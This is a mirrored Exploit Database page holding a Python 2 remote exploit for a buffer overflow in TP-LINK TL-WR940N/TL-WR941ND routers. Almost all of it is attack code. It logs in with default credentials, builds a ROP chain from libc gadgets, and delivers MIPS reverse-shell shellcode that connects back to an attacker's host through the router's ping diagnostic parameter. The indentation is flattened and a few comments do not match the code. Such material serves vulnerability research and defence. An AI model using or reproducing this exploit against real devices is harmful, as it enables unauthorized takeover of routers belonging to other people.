TP-LINK TL-WR940N / TL-WR941ND – Buffer Overflow

• Exploit Database
• 95 阅读

• 作者： Grzegorz Wypych
  日期： 2019-04-09
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/46678/

• #Author Grzegorz Wypych - h0rac
  # TP-LINK TL-WR940N/TL-WR941ND buffer overflow remote shell exploit
  
  import requests
  import md5
  import base64
  import string
  import struct
  import socket
  
  password = md5.new('admin').hexdigest()
  cookie = base64.b64encode('admin:'+password)
  
  print '[+] Authorization cookie: ', cookie
  print '[+] Login to generate user directory...'
  #proxy = {'http':'127.0.0.1:8080'}
  
  loginUrl = 'http://192.168.0.1/userRpm/LoginRpm.htm?Save=Save'
  headers = {'cookie':'Authorization=Basic%20'+cookie.replace('=', '%3D')}
  req = requests.get(loginUrl, headers=headers)
  directory = ''
  
  nop = "\x27\xE0\xFF\xFF"
  
  shellcode = string.join([
  		"\x24\x0f\xff\xfa", # li	t7,-6
  		"\x01\xe0\x78\x27", # nor	t7,t7,zero
  		"\x21\xe4\xff\xfd", # addi	a0,t7,-3
  		"\x21\xe5\xff\xfd", # addi	a1,t7,-3
  		"\x28\x06\xff\xff", # slti	a2,zero,-1
  		"\x24\x02\x10\x57", # li	v0,4183
  		"\x01\x01\x01\x0c", # syscall	0x40404
  		"\xaf\xa2\xff\xff", # sw	v0,-1(sp)
  		"\x8f\xa4\xff\xff", # lw	a0,-1(sp)
  		"\x34\x0f\xff\xfd", # li	t7,0xfffd
  		"\x01\xe0\x78\x27", # nor	t7,t7,zero
  		"\xaf\xaf\xff\xe0", # sw	t7,-32(sp)
  		"\x3c\x0e\x1f\x90", # lui	t6,0x1f90
  		"\x35\xce\x1f\x90", # ori	t6,t6,0x1f90
  		"\xaf\xae\xff\xe4", # sw	t6,-28(sp)
  
  		# Big endian IP address 172.28.128.4
  "\x3c\x0e\xc0\xA8"# lui t6,0x7f01
  		#"\xac\x1c\x80\x04", # lui	t6,0x7f01
  		"\x35\xce\x01\x64", # ori	t6,t6,0x101
  
  		"\xaf\xae\xff\xe6", # sw	t6,-26(sp)
  		"\x27\xa5\xff\xe2", # addiu	a1,sp,-30
  		"\x24\x0c\xff\xef", # li	t4,-17
  		"\x01\x80\x30\x27", # nor	a2,t4,zero
  		"\x24\x02\x10\x4a", # li	v0,4170
  		"\x01\x01\x01\x0c", # syscall	0x40404
  		"\x24\x0f\xff\xfd", # li	t7,-3
  		"\x01\xe0\x78\x27", # nor	t7,t7,zero
  		"\x8f\xa4\xff\xff", # lw	a0,-1(sp)
  		"\x01\xe0\x28\x21", # move	a1,t7
  		"\x24\x02\x0f\xdf", # li	v0,4063
  		"\x01\x01\x01\x0c", # syscall	0x40404
  		"\x24\x10\xff\xff", # li	s0,-1
  		"\x21\xef\xff\xff", # addi	t7,t7,-1
  		"\x15\xf0\xff\xfa", # bne	t7,s0,68 <dup2_loop>
  		"\x28\x06\xff\xff", # slti	a2,zero,-1
  		"\x3c\x0f\x2f\x2f", # lui	t7,0x2f2f
  		"\x35\xef\x62\x69", # ori	t7,t7,0x6269
  		"\xaf\xaf\xff\xec", # sw	t7,-20(sp)
  		"\x3c\x0e\x6e\x2f", # lui	t6,0x6e2f
  		"\x35\xce\x73\x68", # ori	t6,t6,0x7368
  		"\xaf\xae\xff\xf0", # sw	t6,-16(sp)
  		"\xaf\xa0\xff\xf4", # sw	zero,-12(sp)
  		"\x27\xa4\xff\xec", # addiu	a0,sp,-20
  		"\xaf\xa4\xff\xf8", # sw	a0,-8(sp)
  		"\xaf\xa0\xff\xfc", # sw	zero,-4(sp)
  		"\x27\xa5\xff\xf8", # addiu	a1,sp,-8
  		"\x24\x02\x0f\xab", # li	v0,4011
  		"\x01\x01\x01\x0c"# syscall	0x40404
  ], '')
  
  libcBase= 0x77f53000
  sleep = libcBase + 0x53CA0
  gadget1 = libcBase + 0x00055c60 # addiu $a0, $zero, 1; move $t9, $s1; jalr $t9;
  gadget2 = libcBase + 0x00024ecc #lw $ra, 0x2c($sp); lw $s1, 0x28($sp); lw $s0, 0x24($sp); jr $ra;
  gadget3 = libcBase + 0x0001e20c # move $t9, $s1; lw $ra, 0x24($sp); lw $s2, 0x20($sp); lw $s1, 0x1c($sp); lw $s0, 0x18($sp); jr $t9
  gadget4 = libcBase + 0x000195f4 #addiu $s0, $sp, 0x24; move $a0, $s0; move $t9, $s1; jalr $t9; 
  gadget5 = libcBase + 0x000154d8 # #move $t9, $s0; jalr $t9; 
  
  
  print "[+] First gadget address: ", hex(gadget1)
  print "[+] Second gadget address: ", hex(gadget2) 
  print "[+] Third gadget address: ", hex(gadget3)
  print "[+] Fourth gadget address: ", hex(gadget4)
  print "[+] Fifth gadget address: ", hex(gadget4)
  print "[+] Sleep function address: ", hex(sleep)
  payload = "A"*160
  s0 = "BBBB"
  s1 = gadget2
  payload += s0
  payload += struct.pack('>I', s1)
  payload += struct.pack('>I', gadget1) #Overwrite RA address
  #New stack for gadget 2 starts
  payload += "E" * 20 # adjust stack
  payload += "FFFF" #gadget3 -> lw $s0, 0x18($sp) => 24 bytes
  payload += "GGGG" #gadget3 -> lw $s1, 0x1c($sp) => 28 bytes
  payload += "HHHH" #gadget3 -> lw $s2, 0x20($sp) => 32 bytes
  payload += "AAAA"
  payload += "CCCC"
  payload += struct.pack('>I', sleep) #gadget2 -> lw $s1, 0x28($sp) => 40 bytes
  payload += struct.pack('>I', gadget3) #gadget2 -> lw $ra, 0x2c($sp) => 44 bytes
  #New stack for gadget 3 starts
  payload += "G" *24
  payload += "A"* 4 #lw $s0, 0x18($sp); sp + 24 bytes = s0
  payload += struct.pack('>I', gadget5)#lw $s1, 0x1c($sp); sp + 28 bytes = s1 <= load gadget 5 addr
  payload += "C" *4 #lw $s2, 0x20($sp); sp + 32 bytes = s2
  payload += struct.pack('>I', gadget4) #lw $ra, 0x24($sp); sp + 36 bytes = ra <= load gadget 4 addr
  #New stack for gadget 4 starts
  payload += nop * 32
  payload += shellcode #addiu $s0, $sp, 0x24; sp + 36 bytes = s0
  
  if(req.status_code):
  directory = req.text.split('=')[2].split('/')[3]
  print '[+] Retrieved folder name: ', directory
  req.close() 
  referer ='http://192.168.0.1/{0}/userRpm/DiagnosticRpm.htm'.format(directory)
  
  host = '192.168.0.1'
  port = 80
  
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((host, port))
  print "[*] Connected, sending payload {0} bytes...".format(len(payload))
  pingUrl = '{1}/userRpm/PingIframeRpm.htm'.format(host,directory)
  pingUrl += '?ping_addr='+payload+'&doType=ping&isNew=new&sendNum=4&psize=64&overTime=800&trHops=20'
  auth = 'Authorization=Basic%20'+cookie.replace('=', '%3D')
  pingReq = "GET /{0} HTTP/1.1\r\nHost: {1}\r\nReferer: {2}\r\ncookie: {3}\r\n\r\n".format(pingUrl, host, referer, auth)
  print "[+] Exploit request: {0}".format(pingReq)
  s.send(pingReq)
  s.recv(4096)
  s.close()
  else:
  req.close()
  

  Python

  Copy